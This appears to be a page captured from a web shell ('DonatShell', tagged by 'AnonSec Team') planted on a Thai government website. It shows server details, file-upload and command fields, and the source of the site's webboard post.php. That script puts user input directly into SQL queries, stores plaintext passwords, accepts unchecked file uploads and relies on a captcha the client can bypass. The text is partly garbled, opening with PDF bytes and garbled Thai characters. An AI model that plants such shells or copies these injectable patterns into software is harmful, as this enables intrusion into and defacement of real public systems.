%PDF-1.5 % ºaâÚÎΞ-ÌE1�ØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.155.177.87  /  Your IP : 122.155.177.87
Web Server : Apache/2
System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User : phunphin ( 1164)
PHP Version : 5.3.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/phunphin/domains/phunphin.go.th/public_html/webboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/phunphin/domains/phunphin.go.th/public_html/webboard//post.php

<?php
require_once("check_thai_ip.php");

if (!$___in_range) {
	header('HTTP/1.1 403 Forbidden');
	echo "<h1>403 Forbidden</h1><p>äÁè͹حҵãËéà¢éÒ¶Ö§¨Ò¡ IP ¢Í§¤Ø³: " . $_SERVER['REMOTE_ADDR'] . "</p>";
	exit();
}
?>



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title></title>



<link href="../styles.css" rel="stylesheet" type="text/css" />
<!--body -->
<style type="text/css">

body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color:#ffffff;	
	font-family: 'Kanit', sans-serif;	
}

a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}

</style>

<!--body -->





<!--font-->
<link href="https://fonts.googleapis.com/css?family=Chakra+Petch|Kanit|Pridi&display=swap" rel="stylesheet">



</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
  
  <tr>
    <td align="center" valign="top">
	
	<table width="98%" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td><div align="center">
              <?
include("config.inc.php");
include("function.php");

// àªç¤ËÁÇ´¢Í§àÇ纺ÍÃì´
	mysql_connect($host,$user_db,$passwd_db);
	mysql_query ("SET NAMES 'tis620'");
	$c_sql = "select * from webboard_category where cat_name='$Category' ";
	$c_result = mysql_db_query($dbname,$c_sql);
	$c_NRow = mysql_num_rows($c_result);
	$c_row = mysql_fetch_array($c_result);
	
	$nlist = $c_row["cat_title"];

	if($c_NRow==0) { 
		echo "<center><br>";
		echo "<font color=red size=+1> ¡ÃسÒÃÐºØ Category ãËéµÃ§¡Ñº·Õè web à»Ô´ãªé´éǤÃѺ</font>";
		echo "<br>";
		echo "</center>";
		exit();		
	}

// ¨º¡ÒÃàªç¤
	
if ($_SERVER['HTTP_CLIENT_IP']) { 
$IP = $_SERVER['HTTP_CLIENT_IP'];
} elseif (ereg("[0-9]",$_SERVER["HTTP_X_FORWARDED_FOR"] )) { 
$IP = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else { 
$IP = $_SERVER["REMOTE_ADDR"];
}
	$Member = 0;


	// »éͧ¡Ñ¹¡ÒÃá·Ã¡ html ¡Ñº ÅÐà¤Ã×èͧËÁÒ ' "
	$QTitle = htmlspecialchars($QTitle);
	$QNote = htmlspecialchars($QNote);
	$QName = htmlspecialchars($QName);
	$QEmail = htmlspecialchars($QEmail);

// ===== à¾ÔèÁ¿Ñ§¡ìªÑ¹¡Ãͧ¤ÓµéͧËéÒÁ =====
function hasBadWords($text) {
    $badWords = array('¾¹Ñ¹', 'àÇçºâ»ê', 'à«ç¡Êì', 'ºÒ¤ÒÃèÒ', 'ËÇÂ', '¤ÒÊÔâ¹', 'á·§ºÍÅ','á·§ÁÇÂ', 'á·§', 'asd', 'â»ê', '18+', 'xxx', 'àÊÕè§⪤', 'àÇ纾¹Ñ¹', '¡Òþ¹Ñ¹', 'àÇçºá·§ÁÇÂ', 'one', 'ÂÍ´¹ÔÂÁ', 'àÇçºá·§ÁÇÂÍ͹äŹì ', '·Õè´Õ·ÕèÊØ´', 'àÇçºÁÇÂä·Â', 'àª×èͶ×Íä´é', '100%', 'àÇçºá·§µÐ¡ÃéÍÍ͹äŹì', 'á·§µÐ¡ÃéÍÊ´ä´é·Ø¡Çѹ', 'àÇçºá·§µÐ¡ÃéÍÍ͹äŹì', '¾¹Ñ¹¡ÕÌÒÍ͹äŹì', 'Íѹ´Ñº1', 'TOP1', 'ä´éà§Ô¹¨ÃÔ§', 'ÊÁѤçèÒÂ', 'ÅÔ¢ÊÔ·¸Ôìá·é ', 'àÇçºÂÍ´¹ÔÂÁ', 'àÇçºÁÇÂ', '¨èÒ¨ÃÔ§', 'ÁÑ蹤§»ÅÍ´ÀÑÂ', 'á·§ÇÑÇ', 'á·§ä¡è', 'Åͧà»Ô´ã¨ÁÒàÅè¹ÊÑ¡¤ÃÑé§', 'ÂØÊãËÁèà¢éÒ§èÒÂá¹è¹Í¹', 'TOP10', 'àÇçºÊÅç͵ÃÒÂãË­è¢Í§ä·Â', 'Ãкº¶Í¹à§Ô¹ÍÍâµé', 'äÁèÁÕ¢Õ´¨Ó¡Ñ´', 'ÃèÇÁʹء¡Ñºà¡ÁÊÅç͵·Õèᵡ§èÒÂ', 'àª×èÍÁÑè¹ä´éàÅÂÇèÒàÁ×èÍàÅ蹡ѺàÃÒ', 'UFAX198 ', 'ÃèÇÁʹء¡Ñºà¡ÁÊÅç͵·Õèᵡ§èÒÂ', 'äÁèÇèҤس¨ÐàÅ×Í¡àÅè¹¼èÒ¹¤èÒÂä˹', '¤Ø³¨Ðä´éÃѺ¼ÅµÍºá·¹ÊÙ§', 'ON.9', 'àÅè¹ËÇÂÅÒÇ', 'ËÇÂÎÒ¹ÍÂ', 'ÊÁѤÃàÇçºËÇÂ', 'á·§ËÇÂ24', 'ÍѵÃÒ¨èÒÂ', '¡ÕÌҿصºÍÅ·Õè¹èÒÃѺªÁ', 'á¹Ð¹Ó@BY789', '¡ÒôٺÍÅÊ´', 'ÀÒ¾¤ÁªÑ´', 'áÅйÓàʹÍä´éÍÂèÒ§´ÕäÁÕÁÕÊдش', '@]BY789', 'ä¡èª¹Í͹äŹì', 'ä¡èª¹ä·Â', 'ÁÇÂä·Â@BY789', 'ÁÇÂä·Â@BY789ÈÔŻлéͧ¡Ñ¹', '¡ÕÌÒ·ÕèÃÇÁÃèÒ§¡ÒÂáÅШԵã¨', 'àÇçºllnvºÍÅ', 'àÇçºä˹´Õ', 'àÇçºllnvºÍÅÍ͹äŹì', 'llnvºÍÅ', 'ÈÔŻлéͧ¡Ñ¹', '¢Íá¹Ð¹Ó');
    foreach ($badWords as $word) {
        if (stripos($text, $word) !== false) {
            return true;
        }
    }
    return false;
}

// àªç¤ËÁÇ´¢Í§àÇ纺ÍÃì´
	mysql_connect($host,$user_db,$passwd_db);
	mysql_query ("SET NAMES 'tis620'");
	$c_sql = "select * from webboard_category where cat_name='$Category' ";
	$c_result = mysql_db_query($dbname,$c_sql);
	$c_NRow = mysql_num_rows($c_result);
	$c_row = mysql_fetch_array($c_result);
	
	$nlist = $c_row["cat_title"];

	if($c_NRow==0) { 
		echo "<center><br>";
		echo "<font color=red size=+1> ¡ÃسÒÃÐºØ Category ãËéµÃ§¡Ñº·Õè web à»Ô´ãªé´éǤÃѺ</font>";
		echo "<br>";
		echo "</center>";
		exit();		
	}

// ¨º¡ÒÃàªç¤

if ($_SERVER['HTTP_CLIENT_IP']) { 
$IP = $_SERVER['HTTP_CLIENT_IP'];
} elseif (ereg("[0-9]",$_SERVER["HTTP_X_FORWARDED_FOR"] )) { 
$IP = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else { 
$IP = $_SERVER["REMOTE_ADDR"];
}
$Member = 0;

// »éͧ¡Ñ¹¡ÒÃá·Ã¡ html ¡Ñº ÅÐà¤Ã×èͧËÁÒ ' "
$QTitle = htmlspecialchars($QTitle);
$QNote = htmlspecialchars($QNote);
$QName = htmlspecialchars($QName);
$QEmail = htmlspecialchars($QEmail);

// ===== µÃǨÊͺ¤ÓµéͧËéÒÁ ¡è͹´Óà¹Ô¹¡ÒõèÍ =====
if (hasBadWords($QTitle) || hasBadWords($QNote)) {
	echo "<center><br><font color=red size=+1> ¢éͤÇÒÁÁÕ¤ÓµéͧËéÒÁ àªè¹ ¡Òþ¹Ñ¹ ËÃ×ͤÓäÁèàËÁÒÐÊÁ ¡ÃسÒá¡é䢡è͹â¾Êµì</font><br>";
	echo "<a href='javascript:history.back(1)' class='styles2'>[ ¡ÅѺä»á¡éä¢ ]</a></center>";
	exit();
}

// »éͧ¡Ñ¹¤ÓËÂÒº
$QTitle = CheckRude($QTitle);
$QNote = CheckRude($QNote);
$QName = CheckRude($QName);
$QEmail = CheckRude($QEmail);
	
	// µÃǨÊͺ¡ÒÃá·Ã¡ÃÙ»ÀÒ¾
	$txt = array(":b1:", ":b2:",":b3:", ":b4:", ":b5:", ":b6:", ":b7:", ":b8:", ":b9:", ":b10:", ":b11:");
	$pic = array("b1.gif","b2.gif","b3.gif","b4.gif","b5.gif","b6.gif","b7.gif","b8.gif","b9.gif","b10.gif","b11.gif");
	for ($a=0 ; $a<sizeof($txt) ; $a++) {
		$QNote = eregi_replace($txt[$a],"<img src=\"pic/$pic[$a]\">",$QNote);
	}

	// µÃǨÊͺÇèÒ ÁÕ¡Òûé͹ url ËÃ×Í email ÁÒËÃ×ÍäÁè ¶éÒÁÕãËé·Ó link

		//ÊÓËÃѺà»ÅÕè¹ÍÑ¡¢ÃзÕè¡Ó˹´ ãËéà»ç¹á·¡ html µèÒ§æ
		$QNote = eregi_replace ( "\[b\]", "<b> " , $QNote ) ;
		$QNote = eregi_replace ( "\[/b\]", " </b>" , $QNote ) ;
		$QNote = eregi_replace ( "\[i\]", "<i> " , $QNote ) ;
		$QNote = eregi_replace ( "\[/i\]", " </i>" , $QNote ) ;
		$QNote = eregi_replace ( "\[u\]", "<u> " , $QNote ) ;
		$QNote = eregi_replace ( "\[sup\]", "<sup> " , $QNote ) ;
		$QNote = eregi_replace ( "\[/sup\]", " </sup>" , $QNote ) ;
		$QNote = eregi_replace ( "\[sub\]", "<sub> " , $QNote ) ;
		$QNote = eregi_replace ( "\[/sub\]", " </sub>" , $QNote ) ;
		$QNote = eregi_replace ( "\[/u\]", " </u>" , $QNote ) ;
		$QNote = eregi_replace ( "\[\-\-\-\]", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" , $QNote ) ;
		$QNote = eregi_replace ( "\[color=red\]", "<font color=red > " , $QNote ) ;
		$QNote = eregi_replace ( "\[color=green\]", "<font color=green> " , $QNote ) ;
		$QNote = eregi_replace ( "\[color=blue\]", "<font color=blue> " , $QNote ) ;
		$QNote = eregi_replace ( "\[color=orange\]", "<font color=FF6600> " , $QNote ) ;
		$QNote = eregi_replace ( "\[color=pink\]", "<font color=FF00FF> " , $QNote) ;
		$QNote = eregi_replace ( "\[color=gray\]", "<font color=999999> " , $QNote ) ;
		$QNote = eregi_replace ( "\[/color\]", " </font>" , $QNote ) ;

		$QNote = eregi_replace ( "\[glow\]"," <table style=filter:glow(color=pink, strength=3)>  ", $QNote ) ;
		$QNote = eregi_replace ( "\[/glow\]", " </table>" , $QNote ) ;

		$QNote = eregi_replace ( "\[shadow\]","<table style=\"filter:shadow(color=pink, direction=left)\"> ", $QNote ) ;
		$QNote = eregi_replace ( "\[/shadow\]", " </table>" , $QNote ) ;

	// ãËé¢Ö鹺ѹ·Ñ´ãËÁè ¡Ã³Õ·ÕèÁÕ¡ÒÃà¤ÒÐ Enter
	$QNote = eregi_replace(chr(13)," <br> ", $QNote );

	$QNote = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","<a href=\"\\2://\\3\\4\" target=\"_blank\">\\2://\\3\\4</a>", $QNote );
	$QNote = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","<a href=mailto:\\1@\\2\\3\>\\1@\\2\\3</a>", $QNote );

	//µÃǨÊͺ¡ÒÃâ¾Ê¡ÃзÙé (ËéÒÁâ¾Êà¡Ô¹ ¨Ó¹Ç¹·ÕèÃкØã¹ config)
	CheckFlood($IP);
	
	// µÃǨÊͺÇèÒà»ç¹ÊÁÒªÔ¡ËÃ×ÍäÁè 
	$sql = "select User,Password,Email from webboard_member where User='$QName'";
	$result = mysql_db_query($dbname,$sql);
	$NRow = mysql_num_rows($result);
	$row = mysql_fetch_array($result);

	$Member = $row["User"];
	
	// µÃǨÊͺÇèÒ Password ¶Ù¡ËÃ×ÍäÁè
	if($QName==$row["User"] && $QPass==$row["Password"]) 
	{ 
		$Member = 1;
		if(!$QEmail) 
			{
			$QEmail = $row["Email"];
		    }
	}else
	 {
	$Member = 0;
	 }


if(strcmp($_POST['code_input'],$_POST['code_hidden'])==0){ 
// ·Ó¡Òà à¾ÔèÁ¤èÒ¡ÒÃâ¾Ê¢Í§ÊÁÒªÔ¡
	if($Member) {
			$sql3 = "update webboard_member set m_post=m_post+1 where User='$QName'";
			$result3 = mysql_db_query($dbname,$sql3);
	}
	else {	};
// ¨º¡Ò÷ӧҹ

// ºÑ¹·Ö¡ÃÙ»ÀÒ¾
	
if(($QNote =='')&&($QName==''))
{  
	echo "<center >";
	echo "<font size=+1 color=\"red\">";
	echo "¢éͤÇÒÁÊè§ÁÒäÁèÊÁºÙóìÍÒ¨ãÊè¢éÍÁÙÅäÁè¤Ãº ËÃ×͵¡ËÅè¹ÃÐËÇèÒ§¡ÒÃÊè§¢éÍÁÙÅ ¡ÃسÒÊè§¢éͤÇÒÁÍÕ¡¤ÃÑé§<br><br>";

	echo "<font size=+1 color=red >";
	echo "<a href='javascript:history.back(1)'>[ ¡ÅѺä»á¡éä¢ ] </a>";
	echo "</font>";
	echo "</center>";
	
		exit();
	}
	
if( $QPic !='')
	{ 
			srand((double)microtime()*1000000); 
			$QPic_name=$random_pic = rand(1,9999);

# µÃǨÊͺ¤ÇÒÁ¡ÇéÒ§¢Í§ÃÙ»
				$size = getimagesize($QPic);	

# µÃǨÊͺ¢¹Ò´¢Í§ Flash
if ( $QPic_type == "application/x-shockwave-flash" )	{
		if($QPic_size>$flashSize_limit) {
				echo "<br><b><center><font size=3 color=red >¢¹Ò´¢Í§ä¿Åì Flash à¡Ô¹ $flashSize_limit bytes [$flashSize_msg]</font></center></b><br>";
				echo "<br><b><center><font size=3 color=red >[&nbsp;<a href='javascript:history.back(1)'>¡ÅѺä»á¡éä¢</a>&nbsp;]</font></center></b>";
				exit();
			}
	}
else {

# µÃǨÊͺ¢¹Ò´¢Í§ÃÙ»
		if($QPic_size>$Image_size) {
				echo "<br><b><center><font size=3 color=red >¢¹Ò´¢Í§ÀÒ¾à¡Ô¹ $Image_size bytes [$Image_msg]</font></center></b><br>";
				echo "<br><b><center><font size=3 color=red >[&nbsp;<a href='javascript:history.back(1)'>¡ÅѺä»á¡éä¢</a>&nbsp;]</font></center></b>";
				exit();
			}
}

#á»Å§¹ÒÁÊ¡ØÅ áÅзӡÒà upload
if ( $QPic_type == "image/gif" )
		{
			$filename = $QPic_name.".gif";
		}
if ( $QPic_type == "image/bmp" )
		{
			$filename = $QPic_name.".bmp";
		}
if ( $QPic_type == "image/png" )
		{
			$filename = $QPic_name.".png";
		}
if ( $QPic_type == "application/x-shockwave-flash" )
		{
			$filename = $QPic_name.".swf";
		}
elseif (($QPic_type=="image/jpg")||($QPic_type=="image/jpeg")||($QPic_type=="image/pjpeg"))
		{
			$filename =strtolower($QPic_name.$random_pic . '.jpg');
		}
			copy ($QPic , "$path/" . $filename );		
	}


elseif ($QPic == "")
{
echo "";
}


	// àÇÅҨеç¡Ñºà¤Ã×èͧ server ·ÕèàÃÒÃѹ
	$mdate = date("Y-m-d H:i:s");

	// µÃǨÊͺÇèÒà»ç¹ÊÁÒªÔ¡ËÃ×ÍäÁè ·ÕèÊÒÁÒöâ¾Ê»ÃСÒÈä´é
	$sql2 = "select User from webboard_member where User='$QName' and Password='$QPass' and status='1' ";
	$result2 = mysql_db_query($dbname,$sql2);
	$row2 = mysql_fetch_array($result2);

	$Member2 = $row2["User"];

	// àªç¤ username ÇèÒãËéÊÒÁÒöâ¾Ê¢èÒÇ»ÃСÒÈä´éäËÁ
	if($Member2 && $pst==1) {
		$mp = 1;
	}
	else {
		$mp = 0;
	}


//ʤÃÔ»´Ñ¡¡ÃзÙé¢ÂСè͹ŧ°Ò¹¢éÍÁÙÅ
/*	if(ereg("www",$_POST[QNote]) || ereg("http",$_POST[QNote]) || ereg("<a href",$_POST[QNote]) || ereg("<",$_POST[QNote])){
  		echo "\n";
		echo "<center>";
		echo "<BR><BR><a href='javascript:history.back(1)' class='styles2'> ¡Ãس¡ÃÍ¡¢éÍÁÙÅãËé¶Ù¡µéͧ</a><BR><BR><BR><BR>";
		exit;
}*/



	// à¢Õ¹¢éÍÁÙÅŧ database
	$sql = "insert into webboard_data (Category,Question,Note,Name,Namer,Member,IP,Email,Date,nphoto,resolution,pst) values ('$Category','$QTitle','$QNote','$QName','$MsgBy','$Member','$IP','$QEmail','$mdate','$filename','$size[0]','$mp')";
	$result1 = mysql_db_query($dbname,$sql);

	mysql_close(); 	
?>
            </div></td>
          </tr>
          <tr>
            <td><div align="center">
              <table width=60% border=0 bgcolor=#000000 cellpadding=7 cellspacing=1>
                <tr>
                  <td align=center bgcolor=#ffffff class="styles3"><span class="red">ä´éÃѺ¢éÍÁÙÅáÅéǤÃѺ</span><br>
                        <br>
                    ËÒ¡¡ÅѺä»Ë¹éÒáááÅéǤӶÒÁ¢Í§¤Ø³ÂѧäÁè¢Öé¹ãËéÅͧ¡´»ØèÁ Refresh/Reload ¤ÃѺ </font></td>
                </tr>
              </table>
            </div></td>
          </tr>
          <tr>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td class="styles3"><div align="center">| <a href="webboard.php?Category=<? echo $Category; ?>" class="styles2">áÊ´§¤Ó¶ÒÁ</a> || <a href="postq.php?Category=<? echo $Category; ?>" class="styles2">µÑé§¡ÃзÙéãËÁè </a>|</div></td>
          </tr>
		<?
		  }

			else{
			echo "<br><b><center><span class=red>¡ÃسÒãÊè¤èÒ Verification code</span></center></b><br>";
				echo "<br><b><center><span class=styles1 >[&nbsp;<a href='javascript:history.back(1)' class=styles2>¡ÅѺä»á¡éä¢</a>&nbsp;]</span></center></b>";

		}		
			?>
			<tr>
            <td>&nbsp;</td>
          </tr>
        </table>
	</td>
  </tr>
  
  
  
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>

Anon7 - 2022
AnonSec Team